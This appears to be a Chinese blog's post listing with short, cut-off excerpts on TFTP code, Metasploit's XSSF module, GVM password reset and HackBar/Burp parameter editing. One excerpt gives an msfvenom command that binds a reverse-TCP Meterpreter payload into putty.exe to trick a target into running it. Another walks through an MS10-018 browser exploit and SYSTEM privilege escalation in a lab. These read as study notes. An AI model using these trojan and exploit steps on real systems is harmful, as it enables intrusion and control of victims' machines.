m0_43406494的博客

import socketimport pdbimport osimport rebuff_size=1024opcode={'read':b'\x00\x01','write':b'\x00\x02','data':b'\x00\x03','ack':b'\x00\x04','error':b'\x00\x05'}error_code={1:b'\x00\x01'+b'File not found',2:b'\x00\x02'+b'Access violation',3:b'\x00\x03

可以使用tftpd软件，它支持用作客户端、服务器端，开启两个tftpd分别用作客户端和服务器端进行使用，并使用wireshark来抓取流量包！本节我们看看TFTP数据包的组装方式，为我们代码实现该协议奠定基础。TFTP协议总共有5中不同数据包，分别对应读请求，写请求，数据块，接收回应(ACK)，以及错误。前两种数据包格式一样，只不过某些值域设置有差别，剩下的三种数据包格式各不相同。但无论哪一种数据包，他们都包含一个值域叫操作码，用来定义该数据包属于那种类型。我们先看读请求和写请求数据包的格式，首先是2字

先科学上网，在如下url中下载最新的那个压缩包https://code.google.com/archive/p/xssf/downloads再把data、lib、module、plugin四个目录中的文件复制到metasploit的安装目录里对应的四个文件夹里msf中加载xssf模块...

gvm安装成功但是由于第一次执行gvm-setup结果中的密码串忘了使用gvmd 查询没有新用户使用gvmd --user=admin --new-password=123456也没用使用gvmd --create-user=test --password=123456也没有用。。。但是执行sudo runuser -u _gvm – gvmd --user=admin --new-password=admin成功了！登录成功！...

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.94.135 LPORT=7777 -x putty.exe -k -f exe -o payload.exeo参数指定输出文件名，这里使用payload.exe,一般会改成一些人畜无害的文件名-x 允许我们指定一个自定义的可执行文件作为模板，也就是将木马捆绑到这个可执行文件上。绑定程序自定义，只要能引诱到目标运行它，这里随便选用putty.exe选用payloaduse expl

本次实验中，靶机xp系统的ip地址为192.168.94.132，攻击者kali系统的ip为192.168.94.135搜索MS10-018相关的漏洞利用payload，并选择其中一个配置好选项后进行攻击，kali中开启了8080端口作为服务器在xp系统靶机中，打开IE浏览器访问http://192.168.94.135:8080/n9dakZWR7ARJewO如下可见利用成功，并开启了一个新session...

已经获得了普通用户权限（普通用户new），使用background命令暂时退出session2，使用post/multi/recon/local_exploit_suggester来利用已获得的普通账号，得到目标靶机中的更多漏洞信息由前面结果得到一些可能存在的漏洞，选择一个漏洞进行利用配置参数SESSION为2（前面得到的普通用户权限的session id），跟LHOST（kali的ip）如下得到一个system权限的新session...

Get方法只需使用url的语法，在url中修改参数即可如Post方法使用hackbar插件很方便的添加参数，loadurl将当前页面的url加载到上面的框，勾选post data，添加post的参数，execute即可怎么使用burpsuite修改？如何直接对数据包进行修改从而post参数？解答如下：使用？来添加get方法参数时发送的数据包使用hackbar添加参数时的数据包（如下图），观察学习得知，关键修改三个地方①Get方...